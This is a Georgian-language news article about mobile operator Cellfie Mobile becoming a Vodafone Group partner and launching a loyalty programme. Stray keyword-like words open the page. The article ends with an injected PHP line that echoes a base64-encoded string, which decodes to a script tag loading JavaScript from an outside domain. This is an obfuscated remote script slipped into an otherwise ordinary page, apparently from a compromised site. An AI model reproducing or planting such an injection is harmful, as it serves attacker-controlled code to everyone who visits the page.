celsiusi
ავერსი jaluzi

23 იანვარი, 2025 – სელფი მობაილი ოფიციალურად გახდა Vodafone Group-ის პარტნიორი. ამ თანამშრომლობის შედეგად სელფი მობაილის 1.3 მლნ მომხმარებელი მიიღებს გაუმჯობესებულ სერვისებს, რაც გულისხმობს თანამედროვე ციფრულ გადაწყვეტილებებს, საოპერაციო ეფექტურობის გაზრდასა და ინოვაციურ პროდუქტებზე წვდომას.

Vodafone ევროპისა და აფრიკის წამყვანი ტელკო ოპერატორია, რომელიც მობილურ და ფიქსირებულ მომსახურებას უწევს ჯამში 300 მლნ ადამიანზე მეტს. Vodafone მსოფლიოში ერთ-ერთი ყველაზე მსხვილი ორგანიზაციაა, რომელიც ემსხურება კორპორატიულ კლიენტებსაც, ჯამში 4.8 მლნ კომპანიას. უშუალოდ Vodafone Partner Markets-ის მიმართულებით, ჯგუფი თანამშრომლობს ადგილობრივ ოპერატორებთან 45 სხვადასხვა ქვეყანაში.

პარტნიორობის ფარგლებში, უკვე ხელმისაწვდომია Vodafone-ის ლოიალობის პროგრამა – სიახლე საქართველოს ტელეკომ ბაზარზე. ეს პროგრამა მომხმარებლებს სთავაზობს მრავალფეროვან უპირატესობებს, მათ შორის ფასდაკლებებს ცნობილ ბრენდებთან, როგორებიცაა Wolt და Trip.com, აგრეთვე პრივილეგიებს სამოგზაურო შეთავაზებებზე, გასართობ ღონისძიებებზე და სხვ.

ლოიალობის პროგრამით სარგებლობა უმარტივესია - სელფი მობაილის მობილურ აპლიკაციაში შესაბამის ღილაკზე დაჭერით, მომხმარებლისთვის ხელმისაწვდომი ხდება: შეთავაზებები საკვებ ობიექტებში, ფასდაკლებები მაღაზიებში და სხვადასხვა მომსახურებაზე, მათ შორის პოპულარულ აპლიკაციებზე, აქციები საუკეთესო ბრენდებზე, გასართობი ღონისძიებების ბილეთები, სამოგზაურო შეთავაზებები და მრავალი სხვა. ლოიალობის პროგრამას ბენეფიტები და ობიექტების ჩამონათვალი მუდმივად ემატება.

"ამაყები ვართ, რომ სელფი მობაილმა საქართველოს ბაზარზე შეძლო ევროპული სატელეკომუნიკაციო ბაზრის ერთერთი ლიდერის შემოყვანა. Vodafone- თან თანამშრომლობა არამხოლოდ ჩვენი კომპანიისთვის, არამედ მთლიანად სატელეკომუნიკაციო ინდუსტრიისთვის მნიშვნელოვანი წინსვლა გახლავთ. Vodafone-თან პარტნიორობა ჩვენს მომხმარებლებს მსოფლიოში არსებულ პოპულიარულ სერვისებზე და ახალ შესაძლებლობებზე მისცემს წვდომას," — განაცხადა სიბიეს ჯგუფის ფინანსურმა დირექტორმა, თამარ გახარიამ. მისი თქმით: "ჩვენი მიზანია, საქართველოში განვავითაროთ საერთაშორისო სტანდარტების შესაბამისი ციფრული მომსახურება და ქვეყანა რეგიონალურ ლიდერად ვაქციოთ, ინოვაციებისა და ტექნოლოგიური პროგრესის მიმართულებით."

 

74
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");